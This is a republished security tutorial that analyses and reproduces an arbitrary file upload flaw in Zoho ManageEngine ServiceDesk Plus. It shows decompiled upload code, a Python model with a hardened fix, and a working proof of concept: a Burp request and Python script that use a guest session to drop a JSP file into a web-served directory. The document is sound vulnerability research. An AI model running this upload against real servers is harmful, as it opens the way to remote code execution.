Shulou (Shulou.com) 05/31 Report
2025-02-24 update, from SLTechnology News & Howtos > Network Security
How to analyze and reproduce the Zoho arbitrary file upload vulnerability is something many newcomers are unclear about. To help with that, this article walks through the analysis and reproduction in detail; readers with this need are welcome to follow along and hopefully take something away from it.
Brief introduction to the vulnerability
Zoho's product ManageEngine ServiceDesk Plus is an IT service management suite with asset management, procurement management, contract management and other functional modules, intended to deliver IT support services.
An arbitrary file upload vulnerability exists in ServiceDesk Plus before 10.0 build 10012. Specifically, FileAttachment_jsp.class in the SDJSPClasses.jar package checks the type of the uploaded file only when the module parameter is "SSP", "DashBoard" or "HomePage"; when the module parameter is "CustomLogin" no type check is performed at all. An attacker with a low-privilege guest account can therefore upload a JSP script that executes arbitrary commands and then request it directly from the server.
Affected product
Zohocorp ManageEngine ServiceDesk Plus
Affected versions
9.4, and 10.0 before 10.0 build 10012
Fixed version
10.0 build 10013 or later
Vulnerability verification environment
Ubuntu 16.04 (server)
Windows 10 (attacker machine)
Vulnerability analysis and exploitation
Analyze the file-upload logic, locate the defect, and upload a file.
Step one: install Zohocorp ManageEngine ServiceDesk Plus 10.0 build 10000 on the server and start the service. The startup output shown in the original figure indicates that the service came up successfully.
Step two: on the attacker machine, use Burp Suite to capture the cookies and a request of a low-privilege guest user. These are needed later when the PoC request is constructed.
Step three: analyze the server's core file-upload code. Open \ManageEngine\ServiceDesk\lib\SDJSPClasses.jar!\org\apache\jsp\common\FileAttachment_jsp.class. The core upload-check code, with comments, is as follows (decompiled output, lightly cleaned up).
    if (sizeOfFile < maxSize) {
        limitExceeded = false;
        filePath = "Attachments" + filSep + module + filSep + value;
        // If the module parameter is "CustomLogin", the file goes straight to "../custom/login"
        if (module.equals("CustomLogin")) {
            filePath = ".." + filSep + "custom" + filSep + "login";
        }
        File uploadedFile = new File(filePath + filSep + fileName);
        // Only when the module parameter is "SSP", "DashBoard" or "HomePage" is the extension
        // checked; anything other than "htm" or "html" is rejected
        if (module.equals("SSP") || module.equals("DashBoard") || module.equals("HomePage")) {
            String ext = "";
            int i = fileName.lastIndexOf(46);   // 46 == '.'
            if (i > 0) {
                ext = fileName.substring(i + 1);
                if (!ext.equals("htm") && !ext.equals("html")) {
                    out.write("\nssp.widget.onAttachEmpty");
                    out.write("\n");
                    return;
                }
                filSep = "/";
                filePath = ".." + filSep + "custom" + filSep + "widgets" + filSep + module;
                if (module.equals("DashBoard")) {
                    String view = request.getParameter("view");
                    filePath = ".." + filSep + "custom" + filSep + "widgets" + filSep + module + filSep + view;
                }
                uploadedFile = new File(filePath + filSep + fileName);
                // If a file of the same name already exists, append "(n)" before the extension
                int attIndex = fileName.lastIndexOf(".");
                String name = fileName;
                ext = "";
                if (attIndex != -1) {
                    name = fileName.substring(0, attIndex);
                    ext = fileName.substring(attIndex);
                }
                int j = 0;
                String fileName1;
                for (fileName1 = fileName; uploadedFile.exists(); uploadedFile = new File(filePath + filSep + fileName1)) {
                    fileName1 = name + "(" + j + ")" + ext;
                    ++j;
                }
                fileName = fileName1;
            }
        }
        // Create the destination directory and write the uploaded item; no extension
        // check has run for any module other than the three above
        File mkdir = new File(filePath);
        mkdir.mkdirs();
        item.wri   // decompiled output is truncated here in the original
According to this code, the server first checks whether the module parameter is "CustomLogin". If so, it only changes the destination to "../custom/login"; it does not stop, and it does not check the file type. The extension check that follows runs solely when module is "SSP", "DashBoard" or "HomePage", and for those three modules only files with the "htm" or "html" extension are accepted. For "CustomLogin", execution falls through to the mkdirs() call and the write at the end of the routine, so a JSP script can be uploaded unchecked into a directory that the web server serves.
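To make the branching concrete, here is an added Python model of the decision logic above, written for this page and not taken from ServiceDesk Plus. It mirrors the module/extension branching of the decompiled code (returning the path the server would write to, or None for a rejected upload) beside a hardened version that applies one extension allow-list to every module, rejects path separators and traversal in the file name, and confines the canonical destination to an upload root. The root path, the allow-list contents and the set of module names are assumptions for the example.

```python
import posixpath

# Added model of the module/extension branching in the decompiled
# FileAttachment_jsp.class (not ServiceDesk Plus code). Each function returns
# the path the server would write to, or None when the upload is rejected.

HTML_ONLY_MODULES = ("SSP", "DashBoard", "HomePage")


def vulnerable_destination(module, filename, value="1", view="Dashboard1"):
    """Mirror of the original order of checks: "CustomLogin" only redirects the
    destination, and the htm/html check runs for the three widget modules only."""
    file_path = "Attachments/%s/%s" % (module, value)
    if module == "CustomLogin":
        # Written where the web server serves it: step five fetches /custom/login/<name>
        file_path = "../custom/login"
    if module in HTML_ONLY_MODULES:
        dot = filename.rfind(".")
        if dot > 0:
            ext = filename[dot + 1:]
            if ext not in ("htm", "html"):
                return None                    # the only rejection in the whole routine
            file_path = "../custom/widgets/" + module
            if module == "DashBoard":
                file_path += "/" + view
    # Every other module, CustomLogin included, reaches mkdirs() and the write unchecked.
    return file_path + "/" + filename


# Assumed values for the hardened version; they are not taken from the product.
UPLOAD_ROOT = "/opt/ManageEngine/ServiceDesk/Attachments"   # outside any served directory
ALLOWED_EXT = {"htm", "html", "png", "jpg", "gif", "pdf", "txt"}
KNOWN_MODULES = {"SSP", "DashBoard", "HomePage", "CustomLogin"}


def hardened_destination(module, filename, value="1"):
    """Same allow-list for every module, no caller-controlled path segments,
    and the canonical destination must stay under UPLOAD_ROOT."""
    if module not in KNOWN_MODULES or not value.isalnum():
        return None
    # Reject anything that is not a bare file name (slashes, backslashes, ".", "..").
    if (filename != posixpath.basename(filename) or "\\" in filename
            or filename in ("", ".", "..")):
        return None
    dot = filename.rfind(".")
    if dot <= 0:
        return None                            # no extension: nothing to allow-list
    if filename[dot + 1:].lower() not in ALLOWED_EXT:
        return None                            # .jsp, .JSP, .jspx ... all fall out here
    dest = posixpath.normpath(posixpath.join(UPLOAD_ROOT, module, value, filename))
    if not dest.startswith(UPLOAD_ROOT + "/"):
        return None                            # defence in depth against traversal
    return dest


if __name__ == "__main__":
    for mod, name in (("CustomLogin", "test.jsp"), ("SSP", "test.jsp"), ("SSP", "w.html")):
        print(mod, name, "->", vulnerable_destination(mod, name), "|", hardened_destination(mod, name))
```

The key difference is not the list of extensions but where the check sits: in the vulnerable layout the check is attached to three module names, so any other module value skips it, whereas the hardened version decides on the file name alone and only then derives a path it can verify.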
Step four: construct the PoC. In Burp Suite, build the request as follows.
    POST /common/FileAttachment.jsp?module=CustomLogin&view=Dashboard1 HTTP/1.1
    Host: 192.168.6.135:8081
    Content-Length: 366
    Accept: */*
    Origin: http://192.168.6.135:8081
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
    Content-Type: multipart/form-data; boundary=----aaa
    Referer: http://192.168.6.135:8081/DashBoard.do
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,vi;q=0.8
    Cookie: sdpcsrfcookie=bd678a1d-28b9-4eae-9d5d5d-f3a7e6f0bd88; servicedeskplus-_zldp=LsfUh%2FKeku9L3s3nPEJp8WNr%2BtCatkARgcAlZRum6ctL03zZZshSooiaABpQbhelmKwM1K1ctjo%3D; servicedeskplus-_zldt=01bc454f-6f2a-492e-889a-6d6b6ffde97d-2; SDPSESSIONID=B7BB216915E8FB5476DA8774161B9474; JSESSIONID=A7BEE85ED00E1AD81BB9E8081BA49D7D; JSESSIONIDSSO=601A38BD1F283CA55D289D78564E09CA
    Connection: close

    ------aaa
    Content-Disposition: form-data; name="sspsetup"

    Attach
    ------aaa
    Content-Disposition: form-data; name="module"

    CustomLogin
    ------aaa
    Content-Disposition: form-data; name="filePath"; filename="test.jsp"
    Content-Type: text/html

    This is shell content
    ------aaa
    Content-Disposition: form-data; name="hmtlcontent"


    ------aaa--
Following the analysis, the request targets the upload handler identified above, sets the module parameter to "CustomLogin", and supplies a file part named test.jsp whose content is "This is shell content".
Step five: access the script file. After restarting the service, request the uploaded file directly, for example http://192.168.6.135:8081/custom/login/test.jsp.
The file is served back, confirming that an arbitrary file was uploaded successfully.
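The same upload can be scripted instead of edited by hand in Burp Suite. The following added example (not code from the original write-up) builds the multipart body with the field names and boundary used in the PoC above, fills in Content-Length from the actual body, and derives the URL under /custom/login/ that step five fetches; send_poc() is the only part that touches the network and is not exercised offline. The lab host is the one from the write-up, the session cookie must be supplied from the guest session captured in step two, and the file content is left as the page's harmless marker string.

```python
import http.client

# Added PoC builder for the FileAttachment.jsp upload (example code, not from the
# write-up). Values below come from the write-up's lab; the cookie is supplied at run time.
BOUNDARY = "----aaa"
HOST = "192.168.6.135:8081"
TARGET = "/common/FileAttachment.jsp?module=CustomLogin&view=Dashboard1"


def build_poc_body(filename="test.jsp", content=b"This is shell content", boundary=BOUNDARY):
    """Reproduce the multipart/form-data body of the Burp request: the sspsetup and
    module fields, the file part (field name filePath) and the empty hmtlcontent field."""
    parts = [
        ("sspsetup", None, None, b"Attach"),
        ("module", None, None, b"CustomLogin"),
        ("filePath", filename, "text/html", content),
        ("hmtlcontent", None, None, b""),
    ]
    out = bytearray()
    for name, fname, ctype, data in parts:
        out += ("--%s\r\n" % boundary).encode()
        disp = 'Content-Disposition: form-data; name="%s"' % name
        if fname:
            disp += '; filename="%s"' % fname
        out += (disp + "\r\n").encode()
        if ctype:
            out += ("Content-Type: %s\r\n" % ctype).encode()
        out += b"\r\n" + data + b"\r\n"
    out += ("--%s--\r\n" % boundary).encode()   # closing delimiter
    return bytes(out)


def build_poc_request(cookie, filename="test.jsp", content=b"This is shell content", host=HOST):
    """Return (path, headers, body); Content-Length is computed from the real body."""
    body = build_poc_body(filename, content)
    headers = {
        "Host": host,
        "Cookie": cookie,                        # captured guest session from step two
        "X-Requested-With": "XMLHttpRequest",
        "Referer": "http://%s/DashBoard.do" % host,
        "Content-Type": "multipart/form-data; boundary=" + BOUNDARY,
        "Content-Length": str(len(body)),
    }
    return TARGET, headers, body


def uploaded_url(filename, host=HOST):
    """The server writes to ../custom/login, which is served as /custom/login/ (step five)."""
    return "http://%s/custom/login/%s" % (host, filename)


def send_poc(cookie, host=HOST):
    """Live send (network access; not run offline): POST the upload and return the status."""
    path, headers, body = build_poc_request(cookie, host=host)
    conn = http.client.HTTPConnection(host, timeout=10)
    conn.request("POST", path, body=body, headers=headers)
    status = conn.getresponse().status
    conn.close()
    return status


if __name__ == "__main__":
    path, headers, body = build_poc_request("SDPSESSIONID=<captured>")
    print(path, headers["Content-Length"], uploaded_url("test.jsp"))
```

Run send_poc() with the cookie string copied from step two, then GET uploaded_url("test.jsp") to reproduce step five; a 200 response carrying the marker string is the same result the screenshot in the original shows.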